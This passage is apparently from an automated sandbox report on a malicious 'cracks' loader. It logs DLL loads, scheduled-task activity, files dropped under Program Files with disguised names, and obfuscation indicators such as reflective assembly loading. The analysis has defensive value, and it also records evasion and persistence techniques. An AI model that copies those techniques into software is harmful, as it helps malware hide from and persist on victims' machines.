            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: version.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: wldp.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: profapi.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: amsi.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: userenv.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: rasman.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: propsys.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: edputil.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: netutils.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: slc.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: sppc.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeDirectory created: C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exeJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeDirectory created: C:\Program Files\WindowsPowerShell\b85529a8a0a78eJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeDirectory created: C:\Program Files\Windows NT\Idle.exeJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeDirectory created: C:\Program Files\Windows NT\6ccacd8608530fJump to behavior
            Source: NewLoaderCracks_1.32.exeStatic file information: File size 2064076 > 1048576
            Source: NewLoaderCracks_1.32.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: NewLoaderCracks_1.32.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: NewLoaderCracks_1.32.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: NewLoaderCracks_1.32.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: NewLoaderCracks_1.32.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: NewLoaderCracks_1.32.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: NewLoaderCracks_1.32.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: NewLoaderCracks_1.32.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: NewLoaderCracks_1.32.exe
            Source: NewLoaderCracks_1.32.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: NewLoaderCracks_1.32.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: NewLoaderCracks_1.32.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: NewLoaderCracks_1.32.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: NewLoaderCracks_1.32.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, zPI4UC7j83EwXD93Buo.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, zPI4UC7j83EwXD93Buo.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, TaHsAXlw4FpSEGPMUxv.cs.Net Code: p2NRiidmRM System.AppDomain.Load(byte[])
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, TaHsAXlw4FpSEGPMUxv.cs.Net Code: p2NRiidmRM System.Reflection.Assembly.Load(byte[])
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, TaHsAXlw4FpSEGPMUxv.cs.Net Code: p2NRiidmRM
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, TaHsAXlw4FpSEGPMUxv.cs.Net Code: p2NRiidmRM System.AppDomain.Load(byte[])
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, TaHsAXlw4FpSEGPMUxv.cs.Net Code: p2NRiidmRM System.Reflection.Assembly.Load(byte[])
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, TaHsAXlw4FpSEGPMUxv.cs.Net Code: p2NRiidmRM
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeFile created: C:\comcontainer\__tmp_rar_sfx_access_check_6484593Jump to behavior
            Source: NewLoaderCracks_1.32.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0055E28C push eax; ret 0_2_0055E2AA
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0055ED46 push ecx; ret 0_2_0055ED59
            Source: C:\comcontainer\SurrogateRef.exeCode function: 5_2_00007FFD34669684 push ebp; retf 5_2_00007FFD34669685
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeCode function: 14_2_00007FFD34659684 push ebp; retf 14_2_00007FFD34659685
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeCode function: 14_2_00007FFD346500BD pushad ; iretd 14_2_00007FFD346500C1
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeCode function: 17_2_00007FFD34679684 push ebp; retf 17_2_00007FFD34679685
            Source: SurrogateRef.exe.0.drStatic PE information: section name: .text entropy: 7.238177576574828
            Source: csrss.exe.5.drStatic PE information: section name: .text entropy: 7.238177576574828
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, v6luaK3qSQdG78Cyn9Y.csHigh entropy of concatenated method names: 'UbyOwveBBZ', 'OeNOXiTnsX', 'xhDO0B6XP6', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'WbfOykEdX4'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, pC7UlOvJvi2hqAkL1D8.csHigh entropy of concatenated method names: 'InaekceOgP', 'CXkeOXy8Iw', 'jUFej3DsLU', 'USjei6u0yo', 'RRieeQJHf2', 'W0OeoIfJdo', 'XSJeH3qTdG', 'GnYefWlxQt', 'J6qeF11k6K', 'jPyePgINBt'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, rmnQxrKweXovxmYFfo7.csHigh entropy of concatenated method names: 'cchNUIkh25', 'zUPNmOjQPP', 'qIJtIOPRG1ZjvXiH1qI', 'mG3Hf1P3cSRYYytdcXP', 'k5OrShPXjSrcIKPLShu', 'Yf1mLSPtaFUUp5bvmp0', 'y3nrD0Pk8RCVZA9NTqE', 'kdLJ9PPfxy75un1r0M0', 'bwoIcUPzudKKsLwKOBl', 'eIwaquLxYE5QaMI2sZn'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, N43Em13sOK0bOJdFKYn.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'uLbSwvYDkJ', 'F7kSXo5Oq0', 'Ye4S0ejdP2', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, EEuZ9r38tkfgiKsc6S5.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'FAyOkJskxn', 'PUYOd208e9', 'rfxOOXcpmM', 'f6rOaDuBaH', 'lktOqeFjmU', 'uv3OSMaq1f', 'n36wJviLJSCZkVIRe71'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, bpHPos9OBbZYq4VcBpa.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'oR90DvYf751JLVGVH2I', 'OpbxXnYz9Q16Rs8bpTf', 'GposnRexhWIGTr9BHTW', 'U95QuMerdImuIqIV1Ak', 'mLjsyiegIr0cj1ECjZw', 'pX2qL1eNbP6LFUMrb8Z'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, miph6a4RmaFZ1Nl1NL.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'efuPsWWpJqBijSMTupx', 'iZNWhZWyYcpBcPkS59V', 'jumLsRWYBuDggxwt2jp', 'kXZdb1Weu9xqVlesb44', 'z8ljwlWlCXFredEF7ml', 'DNq2YFWAlFUf4Mm9y6l'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, t4CLPVs2O746c94BsC.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'NpbC3ZU0p5NkaIktSx5', 'oTGmtLUdZ91AeqAVlIC', 'W5VvsXUGIVLFI0QAfVn', 'n7creJUJsBerPLqj2JI', 'IkKqaaU83biX38lY8iC', 'yJ0Yc2UwhDNBvrSuwOY'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, YKi3fZ9hlb310txy1Nx.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'TDN17SYQ4qWF0NvupFs', 'AhdeobYPubtuci9IuGJ', 'BGsbkxYLGUE2lyfxMol', 'CxXm5jYabGXEy1jwc6l', 'frWUSTYBtUkRC0Te2vS', 'Wkv6FnYodj5P7DdQrcB'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, SSylUP9EuEheEVLMLoR.csHigh entropy of concatenated method names: 'tSK9W692gs', 'aAOlp0lLcNB4TYQckAS', 'KtNQojlaTUIk9ytOT40', 'zG1s5RlQrBNr9yOoHQm', 'W8eiMXlPAo06WJCnY4R', 'jrTPDMlBULIWwgBQM7N', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, ngF7YCRzpDtcgD33ll9.csHigh entropy of concatenated method names: 'hqeXaX3rRb', 'lyrXqmtEXt', 'jBeXSG2g9X', 'GeWAIM191yrIR7LIPxu', 'htlZbX1i2ajK3BLNi1l', 'wxEibH1B3iYH9Uelhmk', 'TUfEhl1oGUqBxp1VsPW', 'iQPpZe1TxySbViodSA4', 'pUVMJq1HwGDIcthXSxi', 'APR4wf1srd4wmi2wnhg'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, Ff88SRvmh15s8qMeoS9.csHigh entropy of concatenated method names: 'zatrunhjW2', 'XhXrxPBiK9', 'Fj0rD95WWa', 'KJtrBkcv0s', 'BowrEfsyQE', 'C4K08fSQnd6EpLS9WPX', 'MVBux7SPGPAUCTasrn6', 'iLfGAgS4lv8RXgFXBR7', 'aNJ5xhSnm0PcMTJ1lFs', 'Nh4ZUYSLwl1Ks8DstFr'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, wfmoFF7hiRD3cgB0IB.csHigh entropy of concatenated method names: 'toFjFhiRD', 'aNIQtr4UNoIW4YXPDY', 'dJWV3x63FI3nIGZZY6', 'NaH0WLba30QKdVZ1K8', 'vaxaYHn6caHt4oyBWn', 'jjc89tQ8NyExDy1DXx', 'VCYlBLvOI', 'uCERqN71G', 'IGqv92bCq', 'jp1KNowJ6'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, n0t0pSlTO21awwWGEMh.csHigh entropy of concatenated method names: 'piTvm04MpM', 'FVxvpl6Feh', 'O29vTElPEn', 'dgVvh7XuGZ', 'qiNvNXq2k1', 'dnAmgQZxmkjM05ZNAW4', 'wnVRWPZrnXZAOjFWu9x', 'OLFvLKcfL3OTtLUUSGn', 'UqlkV4czxp6kEFWui1B', 'xFhyK0ZgCReDkXMUVFa'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, s4k6M29947Pd4eU9gQX.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'O1mXrNpGeywXXCHv5hG', 'PdVPW5pJGYXZLTfdVAp', 'RYcxgup8yu8t3msQRiK', 'KFXH3hpw1dbKdeyxG1E', 'KYbpQtp5QekFTQAKu5A', 'UbNhxlpKckVmBNhbjqa'
